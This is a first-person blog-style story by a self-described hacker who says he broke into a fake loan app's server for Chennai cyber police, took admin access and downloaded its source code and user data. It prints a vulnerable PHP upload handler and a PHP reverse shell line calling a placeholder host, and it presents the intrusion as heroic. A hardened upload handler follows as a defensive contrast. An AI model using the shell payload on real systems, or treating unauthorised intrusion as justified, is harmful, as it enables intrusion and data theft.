Real Case:
Do You Know How I Helped Cybercrime Police Solve a Fake Loan App and Uncover the Accused's IP? 🤔
I'm here to share an interesting investigation story that occurred on December 13, 2022. You may or may not be aware, but I specialize in investigating cybercrime cases.
I firmly believe that utilizing my cyber security skills can contribute to cracking down on cybercrime. This particular case allowed me to showcase my expertise.
Initial Contact from Police
On December 13, I received a case through WhatsApp from the Chennai Cyber Cell. They wanted information about a suspicious website that was collecting money from people.
They had a few doubts:
- What type of data was the website collecting?
- Could we gather information ourselves?
First Steps - OSINT & Web Analysis
Given my proficiency in web hacking and security testing, with proper permission, I decided to conduct OSINT (Open Source Intelligence) to find valid information about the target.
However, it didn't yield fruitful results 😐. So, I took a bold step and decided to take over the target server. After several attempts, I successfully gained admin access and changed the password. To my astonishment, the website had collected personal data from over 4000+ users.
Discovery: The Fake Loan Network
After conducting a thorough analysis, I confirmed that it was a fake loan app run by individuals from China. A total of 27,019 users had been approved for fake loans. I meticulously recorded everything, collecting evidence and creating a comprehensive case report.
The report included details such as the server IP, server owner IP, information of approved loan users, and a proof-of-concept video demonstrating the server compromise.
Screenshots
From Cybercrime Police Tamil Nadu: “Hi sir, www211.xxxx.xyz This is fake website which impersonated as Yubi and misrepresenting to the public that they can provide loan facility and collecting money from public as security deposit. Doubts: 1. What type of data to be collect for this fake website. 2. Who will give the data or to whom address the request. 3. Can we collect any information by ourselves by using any tools or OSINT. Pl reply sir”
Sent by me (Karthithehacker): “hello sir i successfully hacked this website and take control of it yes its fake website run by Chinese peoples and this web site already collected 4000+ users info i attached my hacked poc (proof of concept) video do check it out”



Technical Exploitation: File Upload Vulnerability
During the hacking of the web application, I identified a file upload vulnerability in the profile picture update feature. This functionality lacked proper file validation and allowed me to upload arbitrary files.
Here’s a simplified version of the vulnerable PHP code:
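<?php
// Deliberately vulnerable: the destination keeps the client-supplied file name,
// including its extension (for example .php), inside a web-served directory.
$target_dir = "profiles/";
$target_file = $target_dir . basename($_FILES["profile_pic"]["name"]);
// No check of extension, MIME type, size or upload error before saving.
move_uploaded_file($_FILES["profile_pic"]["tmp_name"], $target_file);
?>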
This code accepts any file type and saves it to the server without checking the file extension or MIME type. I crafted a reverse shell payload in PHP and uploaded it:
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR-IP/PORT 0>&1'");
?>
Once the shell was uploaded, I triggered the file to establish a reverse shell connection from my VPS. After gaining access, I compressed and downloaded the source code of the web application. While analyzing it, I discovered hardcoded admin credentials.
In this situation, the source code alone wouldn’t be helpful for law enforcement, so I used the credentials to log into the admin panel, documented all findings, and immediately changed the credentials to prevent misuse.
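A hardened counterpart to the simplified upload handler shown above, as an added example that is not code from the original post or from the investigated application. The storage path, the size limit, the JPEG/PNG allow-list and the function name `store_profile_picture` are assumptions made for illustration.

```php
<?php
// Added example, not code from the original post. Assumed values: the storage
// path, the 2 MiB limit and the JPEG/PNG allow-list.
declare(strict_types=1);

const UPLOAD_DIR = '/var/app-data/profiles'; // assumed: outside the web root
const MAX_BYTES  = 2 * 1024 * 1024;
const ALLOWED    = ['image/jpeg' => 'jpg', 'image/png' => 'png']; // MIME => extension

function store_profile_picture(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed');
    }
    $tmp = (string) ($file['tmp_name'] ?? '');
    if (!is_uploaded_file($tmp)) {
        throw new RuntimeException('Not an HTTP upload');
    }
    $size = filesize($tmp); // measure on disk, do not trust the reported size
    if ($size === false || $size === 0 || $size > MAX_BYTES) {
        throw new RuntimeException('File size out of range');
    }
    // Detect the type from the content; the client's name and Content-Type are untrusted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    $ext  = is_string($mime) ? (ALLOWED[$mime] ?? null) : null;
    if ($ext === null || @getimagesize($tmp) === false) {
        throw new RuntimeException('Only JPEG and PNG images are accepted');
    }
    // Server-generated name and extension: nothing from the request reaches the
    // path, so a ".php" suffix or "../" in the original name has no effect.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($tmp, $dest)) {
        throw new RuntimeException('Could not store the upload');
    }
    chmod($dest, 0640); // data file: no execute bit
    return $name;
}

if (isset($_FILES['profile_pic'])) {
    try {
        echo 'Stored as ' . store_profile_picture($_FILES['profile_pic']);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'Upload rejected';
    }
}
```

Content checks alone can be passed by a file that is both a valid image and contains script text, so the server-chosen extension and a storage location the web server never executes from are the controls that matter most. Files kept outside the web root are then served through a separate script that sets the image Content-Type itself.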
Final Thoughts
All of this work was accomplished within a span of 12 hours. I consider it my responsibility as an Indian to provide my services and utilize my skills to assist government law enforcement agencies. 🇮🇳🔒
For detailed information, please check the attached screenshots.
Note: Not all the time will I be successful in penetrating and gaining admin access to servers. Sometimes, I may fail to gain access. However, I always promise myself to do my best.
Remember, stay safe from cyber attacks! If you need assistance with cyber-related problems, you can reach out by calling 1930 (National Cyber Crime HelpLine).
Conclusion
I believe I used my skills to protect people in this digital era. Stay safe, stay alert—and never trust unfamiliar links without verifying them first.



